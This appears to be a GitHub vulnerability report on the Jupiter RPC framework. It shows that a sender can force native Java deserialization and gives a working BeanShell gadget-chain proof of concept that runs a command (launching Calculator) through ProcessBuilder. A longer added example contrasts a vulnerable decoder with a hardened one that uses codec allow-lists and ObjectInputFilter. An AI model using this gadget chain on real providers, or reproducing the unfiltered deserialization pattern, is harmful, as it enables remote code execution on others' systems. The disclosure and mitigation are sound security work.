Another approach capable of achieving RCE attacks
adv851 opened this issue
Problem Description
As Jupiter's deserialization protocol is dictated by the sender's request configuration, an attacker can induce the Provider side to use the native JDK protocol to deserialize carefully crafted serialized data, thereby achieving an RCE attack.
Reproduce
Provider
We used the project's built-in module "jupiter-example" to set up the test environment for the attack. The JDK version used is 8u65.
POC
At line 66, change the deserialization protocol to Native JAVA, and at line 70, replace the malicious injection object (there are several known candidate injection objects; one is selected here as an example, and this chain depends on the following JAR file).
<dependency>
    <groupId>org.beanshell</groupId>
    <artifactId>bsh</artifactId>
    <version>2.0b5</version>
</dependency>
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.Comparator;
import java.util.PriorityQueue;

import bsh.Interpreter;
import bsh.XThis;

// Strings.join and the Reflections field helpers used below are the ysoserial
// utility classes (ysoserial.payloads.util); this is its BeanShell1 gadget chain.
import ysoserial.payloads.util.Reflections;
import ysoserial.payloads.util.Strings;

public static Object getBshObject() throws Exception {
    // BeanShell script defining compare(): the command is split on spaces and each
    // token is quoted into a String[] for ProcessBuilder (so arguments cannot contain spaces)
    String payload =
        "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
        Strings.join(
            Arrays.asList("open /System/Applications/Calculator.app"
                .replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\"").split(" ")),
            ",", "\"", "\"") +
        "}).start();return new Integer(1);}";
    // Evaluate the script so compare() exists in the interpreter's namespace
    Interpreter i = new Interpreter();
    i.eval(payload);
    // bsh.XThis carries a serializable InvocationHandler that dispatches interface
    // calls to the interpreted methods; pull it out by reflection
    XThis xt = new XThis(i.getNameSpace(), i);
    InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
    // Wrap the handler in a dynamic proxy implementing Comparator
    Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
    // Trigger gadget: PriorityQueue.readObject() calls heapify(), which invokes
    // comparator.compare() on the two queued elements during deserialization
    final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
    Object[] queue = new Object[] {1, 1};
    Reflections.setFieldValue(priorityQueue, "queue", queue);
    Reflections.setFieldValue(priorityQueue, "size", 2);
    return priorityQueue;
}
Attack Impact
Capable of executing an RCE attack; in this attack test, it is demonstrated by launching the calculator application.
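As an added example, not code from this report or from the Jupiter project, the following hypothetical Java provider shows the pattern the report describes, dispatching on a sender-supplied serializer code straight into an unfiltered ObjectInputStream, beside a hardened version in which the provider's own configuration decides which codecs are enabled and native Java deserialization, if it is kept at all, runs under an ObjectInputFilter class allow-list. The codec codes, class names and method names are invented for the example and are not Jupiter's API; the filter API needs JDK 9+ (JDK 8u121+ ships it as sun.misc.ObjectInputFilter), so the reporter's 8u65 setup has no such filter available.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.List;
import java.util.PriorityQueue;
import java.util.Set;

// Hypothetical provider model; codec codes and names are invented for this example.
public final class ProviderDecode {

    static final byte HESSIAN     = 0x01;   // assumed codec code
    static final byte JAVA_NATIVE = 0x02;   // assumed codec code

    // Vulnerable pattern: the request's header byte alone picks the codec, so any
    // client can force native Java deserialization, and any gadget chain on the
    // provider's classpath (such as the bsh chain above) fires inside readObject().
    static Object decodeVulnerable(byte serializerCode, byte[] body)
            throws IOException, ClassNotFoundException {
        if (serializerCode == JAVA_NATIVE) {
            try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(body))) {
                return in.readObject();
            }
        }
        throw new IOException("other codecs are not modeled in this example");
    }

    // Allow-list filter: only the expected DTO class may be deserialized. Every other
    // class (PriorityQueue, dynamic proxies, ...) is rejected before it is instantiated,
    // so a gadget's readObject() never runs. Depth and reference counts are capped too.
    static final ObjectInputFilter DTO_ONLY = info -> {
        if (info.depth() > 8 || info.references() > 64) {
            return ObjectInputFilter.Status.REJECTED;
        }
        Class<?> c = info.serialClass();
        if (c == null) {                      // limit-only callback, no class to judge
            return ObjectInputFilter.Status.UNDECIDED;
        }
        return c == Greeting.class ? ObjectInputFilter.Status.ALLOWED
                                   : ObjectInputFilter.Status.REJECTED;
    };

    // Hardened pattern: the provider's configuration (enabledCodecs), not the request,
    // decides which codecs are accepted, and native Java is wrapped in the filter.
    static Object decodeHardened(Set<Byte> enabledCodecs, byte serializerCode, byte[] body)
            throws IOException, ClassNotFoundException {
        if (!enabledCodecs.contains(serializerCode)) {
            throw new IOException("serializer " + serializerCode + " is not enabled on this provider");
        }
        if (serializerCode == JAVA_NATIVE) {
            try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(body))) {
                in.setObjectInputFilter(DTO_ONLY);
                return in.readObject();
            }
        }
        throw new IOException("other codecs are not modeled in this example");
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    // The one DTO this provider legitimately expects over the native Java codec.
    static final class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        final String name;
        Greeting(String name) { this.name = name; }
        @Override public String toString() { return "Greeting(" + name + ")"; }
    }

    public static void main(String[] args) throws Exception {
        byte[] dto = serialize(new Greeting("jupiter"));
        // Stand-in for the gadget: a harmless PriorityQueue. Its readObject() calls
        // heapify() -> comparator.compare(), which is exactly what the bsh chain abuses.
        byte[] gadgetShaped = serialize(new PriorityQueue<>(List.of(1, 2)));

        System.out.println("vulnerable: " + decodeVulnerable(JAVA_NATIVE, gadgetShaped));

        Set<Byte> hessianOnly = Set.of(HESSIAN);
        try {
            decodeHardened(hessianOnly, JAVA_NATIVE, gadgetShaped);
        } catch (IOException e) {
            System.out.println("hardened (codec not enabled): " + e.getMessage());
        }

        Set<Byte> withNative = Set.of(HESSIAN, JAVA_NATIVE);
        System.out.println("hardened (allow-listed DTO): " + decodeHardened(withNative, JAVA_NATIVE, dto));
        try {
            decodeHardened(withNative, JAVA_NATIVE, gadgetShaped);
        } catch (InvalidClassException e) {
            System.out.println("hardened (filter rejected): " + e.getMessage());
        }
    }
}
```

The two checks are independent on purpose: refusing codecs the operator did not enable closes the sender-controlled protocol switch the report relies on, and the filter limits the damage if native Java must stay enabled for compatibility, because a class allow-list is consulted when the class descriptor is read, before PriorityQueue or the bsh proxy is instantiated.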